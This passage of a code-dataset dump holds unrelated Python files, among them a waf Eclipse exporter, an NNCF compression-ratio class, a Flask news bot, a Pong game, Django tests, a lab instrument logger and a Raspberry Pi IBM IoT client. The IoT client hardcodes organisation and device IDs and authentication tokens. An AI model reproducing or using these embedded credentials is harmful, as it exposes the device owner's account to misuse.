prop.setAttribute(\"name\", \"org.python.pydev.PYTHON_PROJECT_INTERPRETER\")\n # add waf's paths\n wafadmin = [p for p in system_path if p.find(\"wafadmin\") != -1]\n if wafadmin:\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_pathproperty\",\n {\"name\": \"org.python.pydev.PROJECT_EXTERNAL_SOURCE_PATH\"},\n )\n for i in wafadmin:\n self.add(doc, prop, \"path\", i)\n if user_path:\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_pathproperty\",\n {\"name\": \"org.python.pydev.PROJECT_SOURCE_PATH\"},\n )\n for i in user_path:\n self.add(doc, prop, \"path\", \"/${PROJECT_DIR_NAME}/\" + i)\n\n doc.appendChild(pydevproject)\n return doc\n\n def impl_create_javaproject(self, javasrcpath, javalibpath):\n # create a .classpath file for java usage\n doc = Document()\n javaproject = doc.createElement(\"classpath\")\n if javasrcpath:\n for i in javasrcpath:\n self.add(doc, javaproject, \"classpathentry\", {\"kind\": \"src\", \"path\": i})\n\n if javalibpath:\n for i in javalibpath:\n self.add(doc, javaproject, \"classpathentry\", {\"kind\": \"lib\", \"path\": i})\n\n self.add(\n doc,\n javaproject,\n \"classpathentry\",\n {\"kind\": \"con\", \"path\": \"org.eclipse.jdt.launching.JRE_CONTAINER\"},\n )\n self.add(\n doc,\n javaproject,\n \"classpathentry\",\n {\"kind\": \"output\", \"path\": self.bldnode.name},\n )\n 
doc.appendChild(javaproject)\n return doc\n\n def addDictionary(self, doc, parent, k, v):\n dictionary = self.add(doc, parent, \"dictionary\")\n self.add(doc, dictionary, \"key\", k)\n self.add(doc, dictionary, \"value\", v)\n return dictionary\n\n def addTarget(\n self, doc, buildTargets, executable, name, buildTarget, runAllBuilders=True\n ):\n target = self.add(\n doc,\n buildTargets,\n \"target\",\n {\"name\": name, \"path\": \"\", \"targetID\": oe_cdt + \".build.MakeTargetBuilder\"},\n )\n self.add(doc, target, \"buildCommand\", executable)\n self.add(doc, target, \"buildArguments\", None)\n self.add(doc, target, \"buildTarget\", buildTarget)\n self.add(doc, target, \"stopOnError\", \"true\")\n self.add(doc, target, \"useDefaultCommand\", \"false\")\n self.add(doc, target, \"runAllBuilders\", str(runAllBuilders).lower())\n\n def add(self, doc, parent, tag, value=None):\n el = doc.createElement(tag)\n if value:\n if type(value) == type(\"\"):\n el.appendChild(doc.createTextNode(value))\n elif type(value) == type(dict()):\n self.setAttributes(el, value)\n parent.appendChild(el)\n return el\n\n def setAttributes(self, node, attrs):\n for k, v in attrs.items():\n node.setAttribute(k, v)\n","sub_path":"docs/.mywaflib/waflib/extras/eclipse.py","file_name":"eclipse.py","file_ext":"py","file_size_in_byte":23253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370459328","text":"\"\"\"\n Copyright (c) 2020 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom typing import Dict\nfrom typing import List\n\nfrom nncf.nncf_network import NNCFNetwork\nfrom nncf.quantization.layers import BaseQuantizer\nfrom nncf.quantization.layers import QUANTIZATION_MODULES\nfrom nncf.quantization.precision_constraints import HardwareQuantizationConstraints\nfrom nncf.quantization.precision_init.base_init import WeightQuantizersHandler\nfrom nncf.quantization.quantizer_id import QuantizerId\nfrom nncf.utils import get_all_modules_by_type\n\n\nclass CompressionRatioCalculator:\n \"\"\"\n Calculates compression ratio - ratio between bits complexity of fully INT8 model and mixed-precision lower-bit one.\n Bit complexity of the model is a sum of bit complexities for each quantized layer, which are a multiplication of\n FLOPS for the layer by number of bits for its quantization. 
The compression ratio can be used for estimation of\n performance boost for quantized model.\n \"\"\"\n DEFAULT_NUMBER_OF_BITS = 8\n\n def __init__(self, model: NNCFNetwork, quantizers_handler: WeightQuantizersHandler):\n flops_per_module_scope = model.get_flops_per_module()\n\n self._weight_quantizers_in_exec_order = quantizers_handler.get_weight_quantizers_in_execution_order_per_id()\n\n self.flops_per_weight_quantizer_id = {}\n quantization_types = [class_type.__name__ for class_type in QUANTIZATION_MODULES.registry_dict.values()]\n all_quantizers_in_model = get_all_modules_by_type(model.get_nncf_wrapped_model(), quantization_types)\n\n for scope in all_quantizers_in_model:\n if quantizers_handler.is_wq_scope(scope):\n quantizer_id = quantizers_handler.get_quantizer_id_by_scope(scope)\n affected_module_scope = quantizers_handler.get_owning_module_scope_from_wq_scope(scope)\n self.flops_per_weight_quantizer_id[quantizer_id] = flops_per_module_scope[affected_module_scope]\n\n self.maximum_bits_complexity = sum(self.flops_per_weight_quantizer_id.values()) * self.DEFAULT_NUMBER_OF_BITS\n\n def compression_ratio_for_bitwitdh_sequence(self, execution_order_bitwidth_sequence: List[int],\n skipped: Dict[QuantizerId, BaseQuantizer] = None) -> float:\n \"\"\"\n Calculates compression ratio for a given bitwidth sequence\n\n Args:\n execution_order_bitwidth_sequence: list of bitwidths for each weight quantization in the order of execution\n skipped: quantizers that were skipped from bitwidth initialization, since their bitwidth is determined\n unambiguously based on constraints of the HW config\n\n Returns:\n compression ratio of mixed-precision model by relation to fully INT8\n \"\"\"\n bits_complexity = 0\n for wq_num_bits, (wq_id, wq) in zip(execution_order_bitwidth_sequence,\n self._weight_quantizers_in_exec_order.items()):\n bits_complexity += wq_num_bits * self.flops_per_weight_quantizer_id[wq_id]\n if skipped:\n for wq_id, wq in skipped.items():\n bits_complexity += wq.num_bits * self.flops_per_weight_quantizer_id[wq_id]\n\n return self.maximum_bits_complexity / bits_complexity\n\n def ratio_limits(self, bitwidths: List[int], constraints: HardwareQuantizationConstraints = None,\n skipped: Dict[QuantizerId, BaseQuantizer] = None) -> (float, float):\n \"\"\"\n Calculates minimum and maximum compression ratio.\n\n Args:\n bitwidths: list of all available bitwidth for weight quantization\n constraints: precision constraints defined by HW config\n skipped: quantizers that were skipped from bitwidth initialization, since their bitwidth is determined\n unambiguously based on constraints of the HW config\n\n Returns:\n minimum and maximum compression ratio\n \"\"\"\n sequence_len = len(self._weight_quantizers_in_exec_order)\n min_bitwidth_sequence = [min(bitwidths)] * sequence_len\n max_bitwidth_sequence = [max(bitwidths)] * sequence_len\n if constraints:\n for i, quantizer_id in enumerate(self._weight_quantizers_in_exec_order):\n bit_constraints = constraints.get(quantizer_id)\n if bit_constraints:\n min_bitwidth_sequence[i] = min(bit_constraints)\n max_bitwidth_sequence[i] = max(bit_constraints)\n\n max_ratio = self.compression_ratio_for_bitwitdh_sequence(min_bitwidth_sequence, skipped)\n min_ratio = self.compression_ratio_for_bitwitdh_sequence(max_bitwidth_sequence, skipped)\n return min_ratio, 
max_ratio\n","sub_path":"nncf/quantization/precision_init/compression_ratio.py","file_name":"compression_ratio.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"21694086","text":"#!/usr/bin/env python\nfrom flask import Flask, url_for, redirect,render_template, request\nimport os, sys, datetime\nbasepath = os.getcwd()\nsys.path.append(basepath)\nsys.path.append(basepath+os.path.sep+\"libs\")\nsys.path.append(basepath+os.path.sep+\"restagents\")\nsys.path.append(basepath+os.path.sep+\"rssagents\")\nfrom config_helper import *\nfrom rest import *\nfrom rss import *\nimport hackernews, nprnews, nytimes, washpost\nimport buzzfeed, marketplace\nfrom werkzeug.debug import get_current_traceback\napp = Flask(__name__)\n\ncache_keywords = []\n@app.route('/', methods=['POST','GET'])\ndef main_page():\n error = None\n if request.method=='POST':\n item= request.form\n return rerouting(item)\n return render_template('index.html',greeting=get_greeting())\n\ndef get_greeting():\n n = datetime.datetime.now()\n retval = \"Hello, there!\"\n if n.hour > 16:\n retval = \"Good evening!\"\n elif n.hour > 13:\n retval = \"Good afternoon!\"\n elif n.hour > 7:\n retval = \"Good morning!\"\n return retval\n\ndef rerouting(item):\n if \"marketplace\" in item:\n return redirect(url_for('.show_entries',source='marketplace'))\n elif \"hackernews\" in item:\n return redirect(url_for('.show_entries',source='hackernews'))\n elif \"buzzfeed\" in item:\n return redirect(url_for('.data_input',source=next(iter(item)))) # dict views are not indexable in Python 3\n elif \"about\" in item:\n return redirect(url_for('.about_page'))\n elif \"nytimes\" in item:\n return redirect(url_for('.data_nytimes'))\n else:\n return redirect(url_for('.data_input',source=next(iter(item))))\n\n@app.route('/about', methods=['POST','GET'])\ndef about_page():\n if request.method=='POST':\n return redirect(url_for('.main_page'))\n return render_template('about_nellie.html')\n\n@app.route('/buzzfeed/data', methods=['POST','GET'])\ndef bzfd_input():\n global cache_keywords\n static_text = \"Select one or more categories\"\n if request.method=='POST':\n if \"about\" in request.form:\n return redirect(url_for('.about_page'))\n cache_keywords = request.form.keys()\n return redirect(url_for('.show_entries',source=\"buzzfeed\"))\n return render_template('get_buzzfeed.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('/nytimes/data',methods=['POST','GET'])\ndef data_nytimes():\n global cache_keywords\n static_text = \"Would you like to search for something or just get today's top stories?\"\n if request.method=='POST':\n if \"about\" in request.form: \n return redirect(url_for('.about_page'))\n if \"headlines\" in request.form:\n cache_keywords = [\"headlines\"]\n else:\n cache_keywords = [item.strip() for item in request.form['data'].split(',')]\n return redirect(url_for('.show_entries',source=\"nytimes\"))\n return render_template('get_nytimes.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('/<source>/data', methods=['POST','GET'])\ndef data_input(source):\n global cache_keywords\n static_text=\"What would you like to know about?\"\n if source == \"hackernews\":\n static_text=\"Enter number of stories:\"\n if request.method=='POST':\n if \"about\" in request.form:\n return redirect(url_for('.about_page'))\n if source==\"nytimes\" and \"headlines\" in request.form:\n cache_keywords = [\"headlines\"]\n else:\n cache_keywords = [item.strip() for item in
request.form['data'].split(',')]\n return redirect(url_for('.show_entries',source=source))\n return render_template('get_optional_data.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('/news/<source>', methods=['GET','POST'])\ndef show_entries(source):\n if request.method=='POST':\n if request.form['home']=='Return to main page':\n return redirect(url_for('.main_page'))\n global cache_keywords\n if source=='marketplace':\n stories = getattr(sys.modules[source], \"get_stories\")()\n elif source=='hackernews':\n stories = getattr(sys.modules[source], \"get_stories\")(15)\n else:\n stories = {}\n for word in cache_keywords:\n stories.update(getattr(sys.modules[source], \"get_stories\")(str(word)))\n try:\n if stories == {}:\n return render_template('show_entries.html',entries=None)\n return render_template('show_entries.html', entries=stories)\n except:\n track = get_current_traceback(skip=1,show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n\n@app.errorhandler(Exception)\ndef exception_handler(error):\n track = get_current_traceback(skip=1,show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n return \"!!!!\" + repr(error)\n\nif __name__==\"__main__\":\n app.run()\n","sub_path":"flask/nellie_bot.py","file_name":"nellie_bot.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"461223446","text":"# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400 \nBALL_RADIUS = 20\nPAD_WIDTH = 10\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\nball_pos = [WIDTH / 2, HEIGHT / 2]\nvel = [-120/240, -60/180]\npaddle1_pos = [4,20,4,80]\npaddle1_vel = [0,0]\npaddle2_pos = [596,20,596,80]\nball_vel = [-120/240, -60/180]\nscore1 = 0\nscore2 = 0\ndef spawn_ball():\n global ball_pos, ball_vel # these are vectors stored as lists\n ball_pos = [WIDTH / 2, HEIGHT / 2]\n ball_vel[0] = - ball_vel[0] # flip the horizontal direction (assumed intent; the original negated ball_vel[1], mixing the axes)\n \n\n# define event handlers\ndef new_game():\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel, ball_pos # these are numbers\n global score1, score2 # these are ints\n #spawn_ball(LEFT)\n\n \ndef draw(canvas):\n global score1, score2, paddle1_pos, paddle2_pos, ball_pos, ball_vel, direction \n global LEFT,RIGHT\n # draw mid line and gutters\n canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\n canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_text(str(score1), [250,112], 48, \"White\") \n canvas.draw_text(str(score2), [325,112], 48, \"White\") \n # update ball\n ball_pos[0] += ball_vel[0]*3\n ball_pos[1] += ball_vel[1]*3\n \n \n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 1, \"Red\", \"White\")\n # update paddle's vertical position, keep paddle on the screen\n \n \n #if ball_pos[0] <= paddle1_pos[3]:\n #ball_vel[0] = - ball_vel[0]\n \n \n if ball_pos[0] <= 10:\n ball_vel[0] = - ball_vel[0]\n score1 = score1+1\n spawn_ball()\n \n elif ball_pos[0] >= 572:\n ball_vel[0] = - ball_vel[0]\n score2 = score2+1\n spawn_ball()\n \n elif ball_pos[1]>= 380:\n ball_vel[1] = - ball_vel[1]\n elif ball_pos[1]<= 20:\n ball_vel[1] = - ball_vel[1] \n \n # draw paddles \n canvas.draw_polygon([[paddle1_pos[0],paddle1_pos[1]],[paddle1_pos[2],paddle1_pos[3]]],
10, 'White')\n canvas.draw_polygon([[paddle2_pos[0],paddle2_pos[1]],[paddle2_pos[2],paddle2_pos[3]]], 10, 'White')\n # determine whether paddle and ball collide \n\n #ball_vel = ball_pos\n \n # draw score\n \ndef keydown(key):\n global paddle1_vel, paddle2_vel, paddle1_pos, paddle2_pos\n \n if key == 83:\n paddle1_pos[1] = paddle1_pos[1] + 20\n paddle1_pos[3] = paddle1_pos[3] + 20\n if key == 87:\n paddle1_pos[3] = paddle1_pos[3] - 20\n paddle1_pos[1] = paddle1_pos[1] - 20\n if key == 40:\n paddle2_pos[1] = paddle2_pos[1] + 20\n paddle2_pos[3] = paddle2_pos[3] + 20\n if key == 38:\n paddle2_pos[1] = paddle2_pos[1] - 20\n paddle2_pos[3] = paddle2_pos[3] - 20\n\n \ndef keyup(key):\n global paddle1_vel, paddle2_vel\n\n\n\n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\n\n\n# start frame\nnew_game()\nframe.start()\n","sub_path":"HomeWork04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159025566","text":"from django.test import TestCase\nfrom django.core import mail\n# Create your tests here.\nfrom .forms import CandidatoForm\nfrom .models import Candidato\n\n\nclass CandidatoModelTest(TestCase):\n\n def test_tratamento_e_envio_frontend(self):\n candidato = Candidato(\n email=\"jorge@email.com\",\n nome=\"Jorge\",\n nota_html=10,\n nota_js=10,\n nota_css=10,\n nota_android=6,\n nota_ios=0,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(\"Obrigado por se candidatar\", mail.outbox[0].subject)\n self.assertIn(\"Front-end\", mail.outbox[0].body)\n\n def test_tratamento_e_envio_backend_e_frontend(self):\n candidato = Candidato(\n email=\"jorge@email.com\",\n nome=\"Jorge\",\n nota_html=10,\n nota_js=10,\n nota_css=10,\n nota_python=10,\n nota_django=10,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(\"Front-end\", mail.outbox[0].body)\n self.assertIn(\"Back-end\", mail.outbox[1].body)\n\n def test_tratamento_e_envio_nao_qualificado(self):\n candidato = Candidato(\n email=\"naojorge@email.com\",\n nome=\"Nao Jorge\",\n nota_html=0,\n nota_js=0,\n nota_css=0,\n nota_python=0,\n nota_django=0,\n nota_android=0,\n nota_ios=0,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 1)\n self.assertNotIn(\"Front-end\", mail.outbox[0].body)\n self.assertNotIn(\"Back-end\", mail.outbox[0].body)\n self.assertNotIn(\"Mobile\", mail.outbox[0].body)\n\n\nclass FormularioViewTest(TestCase):\n\n def test_responder_formulario_envia_email(self):\n self.client.post('/formulario/',\n data={'nome': 'Jorge',\n 'email': 'jorge@email.com',\n 'nota_html': '10'})\n self.assertEqual(len(mail.outbox), 1)\n\nclass CandidatoFormTest(TestCase):\n\n def test_init(self):\n CandidatoForm()\n\n def test_valid_com_dados(self):\n form = CandidatoForm({\n 'nome': \"Jorge\",\n 'email': \"jorge@email.com\",\n 'nota_html': 7,\n 'nota_css': 5,\n 'nota_js': 3,\n 'nota_python': 10,\n 'nota_django': 10,\n 'nota_ios': 1,\n 'nota_android': 8,\n })\n self.assertTrue(form.is_valid())\n\n def test_valid_custom_clean(self):\n form = CandidatoForm({\n 'nome': \"Jorge\",\n 'email': \"jorge@email.com\"\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(form.errors, {\n '__all__': [u'Ao menos uma nota deve ser preenchida'],\n 
})\n","sub_path":"cadastramento/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419182720","text":"\nimport time\nimport sys\nimport pprint\nimport uuid\nfrom uuid import getnode as get_mac\n\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(3,GPIO.OUT) #appliance 1\nGPIO.setup(7,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(11,GPIO.IN) #intruder\nGPIO.setup(13,GPIO.OUT) #appliance 2\nGPIO.setup(15,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(29,GPIO.OUT) #appliance 3\nGPIO.setup(31,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nls1='OFF'\nls2='OFF'\nls3='OFF'\n\ntry:\n\timport ibmiotf.application\n\timport ibmiotf.device\nexcept ImportError:\n\t# This part is only required to run the sample from within the samples\n\t# directory when the module itself is not installed.\n\t#\n\t# If you have the module installed, just use \"import ibmiotf.application\" & \"import ibmiotf.device\"\n\timport os\n\timport inspect\n\tcmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../../src\")))\n\tif cmd_subfolder not in sys.path:\n\t\tsys.path.insert(0, cmd_subfolder)\n\timport ibmiotf.application\n\timport ibmiotf.device\n\n\ndef myAppEventCallback(event):\n\tprint(\"Received live data from %s (%s) sent at %s: hello=%s x=%s\" % (event.deviceId, event.deviceType, event.timestamp.strftime(\"%H:%M:%S\"), data['hello'], data['x']))\n\ndef myCommandCallback(cmd):\n print(\"Command received: %s\" % cmd.command)\n if cmd.command == \"ON 1\":\n print(\"Turning Light ON for Appliance 1\")\n GPIO.output(3,1)\n\n elif cmd.command == \"OFF 1\": \n print(\"Turning Light OFF for Appliance 1\")\n GPIO.output(3,0) \n \n elif cmd.command == \"ON 2\":\n print(\"Turning Light ON for Appliacne 2\")\n GPIO.output(13,1)\n\n elif cmd.command == \"OFF 2\":\n print(\"Turning Light OFF for Appliance 2\")\n GPIO.output(13,0)\n\n elif cmd.command == \"ON 3\":\n print(\"Turning Light ON for Appliance 3\")\n GPIO.output(29,1)\n\n elif cmd.command == \"OFF 3\":\n print(\"Turning Light OFF for Appliance 3\")\n GPIO.output(29,0)\n \n#####################################\n#FILL IN THESE DETAILS\n##################################### \n# organization = \"ovil5l\"\n# deviceType = \"raspberry_pi\"\n# deviceId = \"b827eb61ccaa\"\n# appId = str(uuid.uuid4())\n# authMethod = \"token\"\n# authToken = \"V0b3bK7SalG@DsuQS*\"\n\norganization = \"ysoznq\"\ndeviceType = \"raspberry_pi\"\ndeviceId = \"b827eb61ccaa\"\nappId = str(uuid.uuid4())\nauthMethod = \"token\"\nauthToken = \"WrndLEBcQXFY_3o_9z\"\n\n# Initialize the device client.\ntry:\n\tdeviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken}\n\tdeviceCli = ibmiotf.device.Client(deviceOptions)\nexcept Exception as e:\n\tprint(str(e))\n\tsys.exit()\n\n# Connect and send a datapoint \"hello\" with value \"world\" into the cloud as an event of type \"greeting\" 10 times\ndeviceCli.connect()\ndeviceCli.commandCallback = myCommandCallback\n#x=0\nwhile(1):\n\tlightStatus1=GPIO.input(7) \n\tlightStatus2=GPIO.input(13)\n\tlightStatus3=GPIO.input(31)\n\tif lightStatus1==0:\n\t\tls1='ON'\n\telse:\n\t\tls1='OFF'\n\tif lightStatus2==0:\n\t\tls2='ON'\n\telse:\t\n\t\tls2='OFF'\n\tif lightStatus3==0:\n\t\tls3='ON'\n\telse:\n\t\tls3=\"OFF\"\n\tdata = {'Light Status 1': ls1, 'Light Status 2': 
ls2, 'Light Status 3': ls3}\n\tdeviceCli.publishEvent(\"status\",\"json\", data)\n\t#x=x+1\n\ttime.sleep(1)\n\t\t\n\n# Disconnect the device and application from the cloud\ndeviceCli.disconnect()\n#appCli.disconnect()\n\n","sub_path":"Client Configuration on Raspberry Pi/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262159463","text":"#!/usr/bin/env python3\n#\n# This program controls a TIC500 CryoVac temperature controller. The device \n# is connected to the computer via USB and appears as a COM port.\n# \n\nimport tic500 as t500\nimport time\nfrom datetime import datetime\nimport keyboard # using module keyboard\n\n# Run information\nfilename_prefix = \"cool_down\"\ndata_folder_relative = \"temp_data/cryo_tests\"\n\n# Timestamp for file names\ndateTimeObj = datetime.now()\ntimestamp = dateTimeObj.strftime(\"%d-%b-%Y_%H-%M-%S\")\nprint('Current Timestamp : ', timestamp)\n\n# Write measurements to a file\nf = open(data_folder_relative + \"/\" + filename_prefix + \"_\" \n + timestamp + \".csv\", \"w+\")\n\n# Open the serial device\n# Check this in device manager\n# Also, it should probably be automated\n# It is called PI USB in device manager\ndev = t500.get_dev('COM6')\n\nt500.tic_reset(dev)\nt500.select_channels(dev)\nprint(\"The temperature returned is:\", t500.get_heat_ex(dev) + \"K\")\n\n# Write metadata to file\nf.write(\"=== GENERAL INFORMATION ===\\n\")\nf.write(\"Name: \" + filename_prefix + \"\\n\")\nf.write(\"Date: \" + dateTimeObj.strftime(\"%d %b %Y\") + \"\\n\")\nf.write(\"Time: \" + dateTimeObj.strftime(\"%H:%M:%S\") + \"\\n\\n\")\n\n# Write column headings\nf.write(\"Epoch/s,Valve/V,Temperature/K \\n\")\n\n# Enable output\nt500.output_control(dev, \"ON\")\nt500.set_magprop_volt(dev, 7)\n\nt500.set_limits(dev)\n\n# Write data\nwhile(True):\n \n # Get data\n volt = t500.get_magprop_volt(dev)\n temp = t500.get_heat_ex(dev)\n \n # Write data to file;\n current_epoch = time.time()\n data = str(current_epoch) + \",\"\n data += volt + \",\" + temp\n f.write(data + \"\\n\")\n print(\"Temp:\", temp, \", Magnetic Prop Valve:\", volt)\n time.sleep(1) # 1 second\n if(keyboard.is_pressed('Esc')):\n break # Leave while loop\n\n# Close the file\nf.close()\n\n# Always include this at the end\ndev.close()\n","sub_path":"dies/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"542575288","text":"import numpy as np\n\nsurvival1000 = np.load(\"survival_limits_time1000.npy\")\nn_theta = 30 # Number of scanned angles\nvalues = [0, 1, 4, 16, 64]\ntimes = [1000, 100000, 10000000]\nangles = np.linspace(0., np.pi/2, num = n_theta)\n\nj=0\nfor line in survival1000:\n\tD = 0\n\t#print(line)\n\tfor i in range(0,n_theta-2,2):\n\t\t\t\t\tf1 = (line[ i ]**4)*np.sin(2*angles[i])\n\t\t\t\t\tf2 = (line[i+1]**4)*np.sin(2*angles[i+1])\n\t\t\t\t\tf3 = (line[i+2]**4)*np.sin(2*angles[i+2])\n\t\t\t\t\tD += ((angles[i+2]-angles[i])/6)*(f1 + 4 * f2 + f3)\n\t\t\t\n\tD = D**(1/4)\n\tprint(values[j], D)\n\t#print(np.average(line))\n\tj+=1","sub_path":"integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"297530766","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef convergence_test(env, numiters, policy, *args):\n\n 
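# runs the policy for numiters steps and plots the running-average reward;\n # policy(*args) is assumed to return a valid action for env.step()\n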
cum_reward = np.zeros(numiters)\n av_reward = np.zeros(numiters)\n \n env.reset() # reset environment\n for t in range(numiters-1):\n action = policy(*args)\n state, reward, demand, info = env.step(action)\n cum_reward[t+1] = cum_reward[t] + reward\n av_reward[t+1] = cum_reward[t+1] / (t+1)\n \n plt.plot(range(numiters), av_reward)\n plt.xlabel('time step')\n plt.ylabel('average reward')\n \n print('Average reward: ' + str(av_reward[-1]))\n\ndef evaluate(env, n_episodes, numiters, policy, *args):\n # env: gym environment\n # n_episodes: number of total episodes to run (outer iteration)\n # numiters: number of time steps (inner iteration)\n # policy: policy function\n # *args: arguments in the policy function\n env.seed(0)\n av_reward = np.zeros(n_episodes)\n \n for i in range(n_episodes):\n av_r = 0\n env.reset() # reset environment\n for t in range(numiters):\n action = policy(*args)\n state, reward, demand, info = env.step(action)\n if t > 100 and np.abs( av_r / (t+1) - (av_r + reward) / (t+2)) < 1e-4: # convergence is spotted\n break\n av_r = av_r + reward\n av_reward[i] = av_r / (t+1)\n \n return np.mean(av_reward), np.std(av_reward) # return average reward and std","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"620525269","text":"\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def get_data(self):\n return self.data\n\n def get_next(self):\n return self.next\n \n def set_data(self, data):\n self.data = data\n\n def set_next(self, next):\n self.next = next\n\n def __str__(self):\n return str(self.data)\n\nclass LinkedList(object):\n def __init__(self, head=None):\n self.head = head\n self.length = 0\n\n def get_length(self):\n return self.length\n\n def insert(self,data,index=0):\n if (index < 0) or (index > self.length):\n return\n insert_node = Node(data)\n if (index == 0):\n if (self.head is None):\n self.head = insert_node\n else:\n insert_node.set_next(self.head)\n self.head = insert_node\n else:\n node = self.head\n for _ in range(index - 1):\n node = node.get_next()\n insert_node.set_next(node.get_next())\n node.set_next(insert_node)\n self.length += 1\n\n def find(self, data):\n node = self.head\n index = 0\n while (node is not None):\n if (node.data == data): return index\n index += 1\n node = node.get_next()\n\n def delete(self, index=0):\n if (index < 0) or (index > self.length - 1):\n return\n elif (index == 0):\n self.head = self.head.next\n self.length -= 1 # keep the length in sync when the head is removed\n return\n node = self.head\n if (node is None):\n return\n for _ in range(index - 1):\n node = node.get_next()\n node.next = node.get_next().get_next()\n self.length -= 1\n\n def __str__(self):\n if self.head is None: return \"This list is empty.\"\n else:\n node = self.head\n ret_list = \"[\"\n while (True):\n ret_list += str(node.data)\n if (node.next is None):\n ret_list += \"]\"\n return ret_list\n else:\n ret_list += \", \"\n node = node.get_next()","sub_path":"linked_lists/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"456326297","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 20 16:12:47 2020\n\n@author: mosda\n\"\"\"\nimport random\nimport itertools\nfrom datetime import datetime\n\nclass Individual:\n def __init__(self, size):\n self.size = size\n self.board = []\n self.set_board()\n\n\n
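# the board keeps one slot per individual; an individual here is a pair of\n # random permutations of 1..size (see individual() below)\n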
def get_size(self):\n return self.size\n\n def set_board(self):\n self.board = []\n for x in range(self.size):\n self.board.append([])\n\n def get_board(self):\n return self.board\n\n def add_to_board(self, individual):\n for i in range(len(self.board)):\n if len(self.board[i]) == 0:\n self.board[i] = individual\n break\n return self.board\n\n def place(self, individual, pos):\n '''\n Place the individual on the board\n :param individual:\n :param pos:\n :return:\n '''\n self.board[pos] = individual\n\n def individual(self):\n '''\n Get a random individual\n :return: a list of random numbers in the range 0, size - 1\n '''\n # random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n\n perm1 = random.sample(range(1, self.size + 1), self.size)\n perm2 = random.sample(range(1, self.size + 1), self.size)\n return [perm1, perm2]\n\n def get_all(self, individual):\n '''\n Get all permutations except the given one\n :param individual:\n :return:\n '''\n return list(itertools.permutations(individual))\n\n def population(self, count):\n '''\n Get a population of count members\n :param count: how many individuals (permutations)\n :return: list of count individuals\n '''\n return [self.individual() for x in range(count)]\n\n def fitness(self, individual):\n '''\n If the pairs are repeating in the matrix, increase fitness by 1\n The lower the fitness, the better the candidate\n :param individual: the individual to check\n :param current: the current state of the board\n :return: fitness lvl\n '''\n fit = 0\n for x in range(len(self.board)):\n try:\n for a, b in zip(self.board[x][0], individual[0]):\n if a 